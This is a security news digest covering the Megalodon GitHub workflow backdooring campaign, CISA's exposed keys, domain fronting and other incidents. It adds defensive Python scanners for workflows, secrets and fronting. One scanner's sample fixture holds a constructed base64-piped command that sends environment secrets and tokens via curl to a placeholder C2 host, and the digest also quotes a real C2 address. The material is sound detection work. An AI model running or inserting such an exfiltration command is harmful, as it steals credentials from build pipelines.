Smile! Your WiFi might be watching you
Researchers in Germany are warning that ordinary WiFi networks could soon become a powerful new form of invisible surveillance. By combining standard wireless signals with AI, the team demonstrated a camera-like system capable of identifying people with nearly 100% accuracy, even if they weren’t carrying a WiFi-connected device. It’s a capability that could easily become a dictator's dream and a personal privacy nightmare.
Meanwhile, in more pedestrian security news, a malware-spreading scumbag is swimming through GitHub. The automated campaign, dubbed Megalodon, has pushed malicious commits to more than 5,500 repositories. As Ox Security lead researcher Moshe Siman Tov Bustan explains, the trap relies on tricking maintainers: if a repository owner merges the predatory commit, CI/CD credential-stealing malware executes directly inside their pipeline to propagate the infection further.
Also on our radar this week: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) finally fixed a major blunder after it was caught leaving its own digital cloud storage keys exposed in plain text on GitHub. On the artificial intelligence front, the US government suspended public access to civil transportation accident databases after internet sleuths controversially used AI to recreate the final vocal recordings of deceased pilots from fatal crash transcripts. Finally, convenience store giant 7-Eleven confirmed its corporate systems were compromised in a cyberattack claimed by the notorious ShinyHunters extortion group.
Researchers in Germany are warning that ordinary WiFi networks could become a powerful new form of invisible surveillance. Using standard wireless signals and artificial intelligence, they demonstrated a system capable of identifying people with striking accuracy, even if those individuals are not carrying an active device.
https://www.sciencedaily.com/releases/2026/05/260522023127.htm
A malware-spreading scumbag swimming through GitHub pushed malicious commits to more than 5,500 repositories on Monday as part of an automated campaign called Megalodon. Similar to the earlier TeamPCP attacks that poisoned about 3,800 GitHub repositories, this new campaign has so far infected 5,561 repos with CI/CD credential-stealing malware, according to SafeDep researchers, who uncovered the predatory commits and published a full list of the compromised repositories. If a repository owner merges the commit, the malware executes inside their CI/CD pipeline and propagates further, Ox Security lead researcher Moshe Siman Tov Bustan said in a Thursday blog post.
https://www.theregister.com/security/2026/05/22/megalodon-chums-the-waters-in-55k-github-repo-poisonings/5245342
Megalodon: Mass GitHub Repo Backdooring via CI Workflows - Real-time Open Source Software Supply Chain Security
Over 5,700 malicious commits were pushed to GitHub repositories on May 18, 2026, replacing GitHub Actions workflows with base64-encoded secret exfiltration payloads. The "megalodon" campaign targeted repos including Tiledesk (9 repos), Black-Iron-Project (8 repos), and hundreds of others. @tiledesk/tiledesk-server versions 2.18.6-2.18.12 on npm carry the backdoor. C2: 216.126.225.129:8443.
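The campaign described above replaces a repository's GitHub Actions workflow with a step that decodes a base64 blob into a shell. A maintainer reviewing an incoming pull request can catch that shape mechanically. The scanner below is an added example written for this digest, not code from SafeDep, Ox Security or any of the projects named; the workflow text it checks is a constructed sample, and the exfiltration host in it (c2.example.invalid) is a placeholder, not the campaign's indicator.

```python
import base64
import re

# Constructed sample: a workflow whose build step has been swapped for a
# "echo <base64> | base64 -d | bash" one-liner. The decoded payload is a harmless
# stand-in that only mirrors the shape the report describes (read secrets from
# the environment, post them to a remote host).
_PAYLOAD = (
    'env | grep -i "secret\\|token" | '
    'curl -s -X POST --data-binary @- https://c2.example.invalid:8443/collect'
)
SAMPLE_WORKFLOW = f"""\
name: CI
on: [push, pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Build
        env:
          NPM_TOKEN: ${{{{ secrets.NPM_TOKEN }}}}
        run: echo {base64.b64encode(_PAYLOAD.encode()).decode()} | base64 -d | bash
"""

# Constructed benign workflow for comparison: no decode step at all.
BENIGN_WORKFLOW = """\
name: CI
on: [push]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
"""

# A run of 40+ base64 characters is a practical floor: shorter literals (commit
# ids, hashes) rarely decode to a shell command, and the decode step filters them.
_B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
_DECODE_HINT = re.compile(r"base64\s+(-d|--decode)", re.I)
# Things a decoded payload should not be doing inside a build step: reading
# secrets or tokens, or talking to an external host by URL or IP:port.
_SUSPICIOUS = re.compile(
    r"(secrets?\.|\$\{\{ ?secrets|\bTOKEN\b|\benv\b|curl|wget|https?://"
    r"|\d{1,3}(\.\d{1,3}){3}:\d+)",
    re.I,
)


def scan_workflow(text):
    """Return (line_no, decoded_payload) pairs for lines that pipe a base64 blob
    through a decoder and whose decoded content looks like credential exfiltration."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if not _DECODE_HINT.search(line):
            continue
        for m in _B64_RUN.finditer(line):
            try:
                decoded = base64.b64decode(m.group(0), validate=True).decode("utf-8", "replace")
            except (ValueError, UnicodeDecodeError):
                continue  # not really base64, or binary: leave it to a human
            if _SUSPICIOUS.search(decoded):
                findings.append((n, decoded))
    return findings


if __name__ == "__main__":
    for line_no, payload in scan_workflow(SAMPLE_WORKFLOW):
        print(f"line {line_no}: decoded payload -> {payload}")
    print("benign workflow findings:", scan_workflow(BENIGN_WORKFLOW))
```

Run it as a required check on pull requests that touch `.github/workflows/`, and treat any hit as a reason not to merge until the decoded command has been read in full; an obfuscated step in a workflow has no legitimate reason to exist.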
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has been leaving the digital keys to its own cloud storage accounts sitting out in the open, in plain text form, for some unknown amount of time, according to a report from Krebs on Security. The problem finally got fixed over the weekend, the report says.
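Keys left in plain text in a repository are caught most cheaply before the commit happens. The scanner below is an added example for this digest, not code from CISA or from the Krebs report, and it makes no claim about which key format was actually exposed: it uses two documented credential shapes (the AWS access key ID prefix and the Azure storage `AccountKey=` connection-string field) on a constructed configuration file, and applies a Shannon entropy floor so that obvious placeholders are not reported. The sample key values are the ones AWS publishes for documentation, not real credentials.

```python
import math
import re
from collections import Counter

# Credential shapes that commonly end up in source control. The AWS access key
# ID format (AKIA followed by 16 upper-case letters or digits) and the Azure
# storage connection-string field (AccountKey=<88-char base64>) are both public
# documentation formats, not values taken from the report above.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "aws_secret_access_key": re.compile(
        r"(?i)aws_secret_access_key\s*[=:]\s*['\"]?([A-Za-z0-9/+=]{40})"
    ),
    "azure_storage_account_key": re.compile(r"AccountKey=([A-Za-z0-9+/]{86}==)"),
}

# Constructed sample file. The AWS values are the documentation examples AWS
# publishes; the Azure key is a deliberately low-entropy placeholder.
SAMPLE_CONFIG = f"""\
# terraform.tfvars (constructed sample)
region = "us-east-1"
aws_access_key_id = "AKIAIOSFODNN7EXAMPLE"
aws_secret_access_key = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
storage_conn = "DefaultEndpointsProtocol=https;AccountName=stor;AccountKey={'x' * 86}==;EndpointSuffix=core.windows.net"
"""


def shannon_entropy(s):
    """Bits of entropy per character; a real random key scores well above 3.5."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def scan_text(text, min_entropy=3.5):
    """Return a list of (line_no, kind, preview) for credential-shaped strings.

    Candidates whose entropy is below min_entropy are treated as placeholders
    (for example 'xxxx...') and skipped, which keeps template files quiet."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        for kind, pat in PATTERNS.items():
            for m in pat.finditer(line):
                secret = m.group(1) if m.groups() else m.group(0)
                if shannon_entropy(secret) < min_entropy:
                    continue
                # Never echo the full value back into logs or CI output.
                findings.append((n, kind, secret[:4] + "..." + secret[-2:]))
    return findings


if __name__ == "__main__":
    for line_no, kind, preview in scan_text(SAMPLE_CONFIG):
        print(f"line {line_no}: {kind} ({preview})")
```

Wire `scan_text` into a pre-commit hook over the staged diff and fail the commit on any finding; the entropy floor is a heuristic, so keep a reviewed allowlist for the few documented example keys rather than lowering it.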
https://gizmodo.com/the-worst-leak-that-ive-witnessed-u-s-cybersecurity-agency-leaves-its-digital-keys-out-in-public-on-github-2000760330
Microsoft-owned code-hosting platform GitHub on Wednesday morning confirmed that approximately 3,800 internal repositories were impacted in a supply chain attack. On Tuesday, the infamous hacking group TeamPCP, known for a series of recent supply chain attacks targeting the open source software community, claimed the hack of 4,000 GitHub internal repositories. Boasting about the incident on an underground hacking forum, the threat actor claimed the theft of source code and internal orgs, offering the allegedly stolen information to any buyer willing to pay at least $50,000 for it.
https://www.securityweek.com/github-confirms-hack-impacting-3800-internal-repositories/
34 unique packages compromised, 380-plus affected versions, three major registries hit simultaneously, and a target list that reads like a who’s-who of high-value developer environments like cryptocurrency wallets, DeFi tooling, AI development, and smart contract auditing.
https://thecybersecguru.com/news/trapdoor-supply-chain-attack/
Pilots’ voices from the last seconds of a fatal cargo plane crash have been re-created by Internet sleuths using software and AI tools. The spread of reconstructed audio recordings has prompted a US government agency to suspend all public access to its database of civil transportation accidents—because federal law prohibits investigators from publicly releasing audio from cockpit voice recorders.
https://arstechnica.com/ai/2026/05/ai-users-re-create-dead-pilots-voices-from-crash-investigation-docs/
The Trump administration is building a surveillance network to spy on its own workforce across multiple agencies. It has already given Palantir an initial $3.9 million to do so at the Department of Agriculture (USDA), federal spending disclosures show.
https://prospect.org/2026/05/18/palantir-federal-workers-surveillance-usda-social-security-veterans-affairs/
An apparel site from FBI director Kash Patel has been spotted trying to trick macOS users into installing malware. The site, BasedApparel.com, is part of a merchandise brand that Patel co-created with Andrew Ollis prior to becoming FBI director under the Trump administration. On Thursday, a user based in Portugal spotted the online shop hosting a “ClickFix”-style attack that tries to dupe unsuspecting users into running a malicious command on their Mac computers.
https://ca.pcmag.com/security/15815/kash-patels-apparel-site-is-trying-to-trick-visitors-into-installing-malware
On Wednesday, Microsoft started rolling out security patches for two Defender vulnerabilities that have been exploited in zero-day attacks. The first one, tracked as CVE-2026-41091, is a privilege escalation security flaw affecting Microsoft Malware Protection Engine 1.1.26030.3008 and earlier, which provides the scanning, detection, and cleaning capabilities for Microsoft antivirus and antispyware software. This flaw stems from an improper link resolution before file access, which allows attackers to gain SYSTEM privileges.
https://www.bleepingcomputer.com/news/security/microsoft-warns-of-new-defender-zero-days-exploited-in-attacks/
Security researchers have uncovered a new social engineering scam that uses deceptive pop-ups and fake warnings to trick users into believing their device has been compromised, prompting them to use fraudulent IT helpdesks. This strain is a particularly sophisticated, browser-based version, security firm Barracuda warns, as the malicious code is hidden and can only be activated if the right (poor) security conditions are in place.
https://cybernews.com/security/millions-hit-scareware-attack-fake-it-helpdesks/
Google on Wednesday published exploit code for an unfixed vulnerability in its Chromium browser codebase that threatens millions of people using Chrome, Microsoft Edge, and virtually all other Chromium-based browsers. The proof-of-concept code exploits the Browser Fetch programming interface, a standard that allows long videos and other large files to be downloaded in the background. An attacker can use the exploit to create a connection for monitoring some aspects of a user’s browser usage and as a proxy for viewing sites and launching denial-of-service attacks. Depending on the browser, the connections either reopen or remain open even after it or the device running it has rebooted.
https://arstechnica.com/security/2026/05/google-publishes-exploit-code-threatening-millions-of-chromium-users/
Convenience store chain giant 7-Eleven confirmed that its systems were breached in a cyberattack claimed by the ShinyHunters extortion group last month. Founded in 1927, 7-Eleven now operates, franchises, and licenses over 86,000 stores globally, including 13,000 stores in the U.S. and Canada, while its 7Rewards and Speedy Rewards loyalty programs have more than 100 million members.
https://www.bleepingcomputer.com/news/security/7-eleven-confirms-data-breach-claimed-by-the-shinyhunters-gang/
A large-scale campaign is exploiting a critical SQL injection vulnerability (CVE-2026-26980) in Ghost CMS to inject malicious JavaScript code that triggers ClickFix attack flows. The campaign was discovered by XLab threat intelligence researchers at Chinese cybersecurity company Qianxin, who confirmed impact on more than 700 domains, including university portals, AI/SaaS companies, media outlets, fintech firms, security sites, and personal blogs.
https://www.bleepingcomputer.com/news/security/ghost-cms-sql-injection-flaw-exploited-in-large-scale-clickfix-campaign/
Threat actors are exploiting a vulnerability in shared content delivery network (CDN) infrastructure to hide connections to malicious domains. Dubbed Underminr, the issue is a variant of domain fronting, a now-mitigated type of attack that enabled threat actors to place an allowed domain in the SNI and TLS certificate validation fields of an HTTPS request, while embedding a different target domain in the TLS tunnel’s encrypted HTTP host header.
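The fronting pattern described above is only visible where the Host header can be compared with the name the TLS handshake advertised, which means at a TLS-terminating proxy or an egress gateway. The check below is an added example for this digest, not code from the Underminr researchers; the flow records are constructed, and the two-label "registrable domain" comparison is a simplification that a production version would replace with a Public Suffix List lookup.

```python
from dataclasses import dataclass


@dataclass
class Flow:
    src: str
    sni: str            # server_name from the TLS ClientHello (visible in the clear)
    cert_names: tuple   # names the presented certificate is valid for
    http_host: str      # Host header or :authority, seen only after TLS termination


# Constructed records as an egress proxy might log them. The second flow is the
# legitimate shared-CDN case: two hostnames under one registrable domain. The
# third is the fronting shape: trusted name in SNI, unrelated host inside.
FLOWS = [
    Flow("10.0.0.5", "cdn.example.com", ("cdn.example.com", "*.example.com"), "cdn.example.com"),
    Flow("10.0.0.7", "assets.example.com", ("*.example.com",), "static.example.com"),
    Flow("10.0.0.9", "trusted.example.com", ("trusted.example.com",), "c2.attacker.example"),
]


def registrable_domain(name):
    """Naive eTLD+1: the last two labels. Multi-part public suffixes such as
    co.uk need the Public Suffix List; this is the assumption the example makes."""
    labels = name.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def cert_covers(cert_names, host):
    """True if an exact name or a single-level wildcard in the cert matches host."""
    host = host.lower()
    for name in cert_names:
        name = name.lower()
        if name == host:
            return True
        if name.startswith("*.") and host.count(".") == name.count("."):
            if host.split(".", 1)[1] == name[2:]:
                return True
    return False


def is_fronted(flow):
    """Flag when the decrypted Host names a site outside the SNI's registrable
    domain, or one the presented certificate does not cover at all."""
    if registrable_domain(flow.http_host) != registrable_domain(flow.sni):
        return True
    return not cert_covers(flow.cert_names, flow.http_host)


def find_fronting(flows):
    return [f for f in flows if is_fronted(f)]


if __name__ == "__main__":
    for f in find_fronting(FLOWS):
        print(f"{f.src}: SNI={f.sni} but Host={f.http_host}")
```

A mismatch is a strong signal but not proof on its own: some CDN tenants legitimately serve several domains behind one edge name, so the check belongs in a detection pipeline that enriches the inner hostname with reputation data before alerting.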
https://www.securityweek.com/underminr-vulnerability-lets-attackers-hide-malicious-connections-behind-trusted-domains/
A supply chain attack targeting the Laravel Lang localization packages has exposed developers to a sophisticated credential-stealing malware campaign after attackers abused GitHub version tags to distribute malicious code through Composer packages.
https://www.bleepingcomputer.com/news/security/laravel-lang-packages-hijacked-to-deploy-credential-stealing-malware/
Drupal is warning users that it’s already seeing attempts to exploit CVE-2026-9082, the highly critical vulnerability patched this week. The vulnerability affects an API designed to ensure that database queries are sanitized to prevent SQL injection. “A vulnerability in this API allows an attacker to send specially crafted requests, resulting in arbitrary SQL injection for sites using PostgreSQL databases,” Drupal explains.
https://www.securityweek.com/drupal-vulnerability-in-hacker-crosshairs-shortly-after-disclosure/
The US Justice Department announced on Thursday that a Canadian man has been arrested for operating the recently disrupted Kimwolf DDoS botnet. The suspect, 23-year-old Jacob Butler of Ottawa, known online as ‘Dort’, is accused of administering the botnet and has been charged in the US on one count of aiding and abetting computer intrusion. Butler has been arrested in Canada and the US is seeking his extradition. If found guilty, he faces up to 10 years in prison.
https://www.securityweek.com/canadian-man-arrested-for-operating-kimwolf-botnet/
According to the FBI, First VPN has been active since 2014, providing 32 exit nodes across 27 countries at the time of its disruption. The service, advertised on Russian-language dark web cybercrime forums, has been used by at least 25 ransomware groups for network reconnaissance and intrusions. IP addresses associated with First VPN have been involved in scanning, botnets, DoS attacks, and hacking. The FBI has published an alert with technical details, IoCs, MITRE ATT&CK mappings, and recommendations. According to Europol, law enforcement and partners dismantled 33 servers linked to First VPN and disrupted the infrastructure that supported cybercriminal activity. The takedown targeted the 1vpns.com, 1vpns.net, 1vpns.org, and onion domains.
https://www.securityweek.com/first-vpn-cybercrime-service-disrupted-administrator-arrested/
TrendAI, Trend Micro’s enterprise business, has informed customers that it has patched another Apex One vulnerability that has been exploited in the wild. The zero-day, tracked as CVE-2026-34926, is a medium-severity directory traversal issue that can be exploited by an unauthenticated local attacker to “modify a key table on the server to inject malicious code to deploy to agents on affected installations”. TrendAI noted that the attacker requires admin credentials to the server, and the attack only works against the on-premises version of Apex One.
https://www.securityweek.com/trendai-patches-apex-one-zero-day-exploited-in-the-wild/
Threat actors brute-forced VPN credentials and bypassed multi-factor authentication (MFA) on SonicWall Gen6 SSL-VPN appliances to deploy tools used in ransomware attacks. During the intrusions, the hacker took between 30 and 60 minutes to log in, do network reconnaissance, test credential reuse on internal systems, and log out. SonicWall warned in a security advisory for CVE-2024-12802 that installing the firmware update alone on Gen6 devices does not fully mitigate the vulnerability, and a manual reconfiguration of the LDAP server is required. Failing to do so leaves open the possibility of bypassing MFA protection.
https://www.bleepingcomputer.com/news/security/hackers-bypass-sonicwall-vpn-mfa-due-to-incomplete-patching/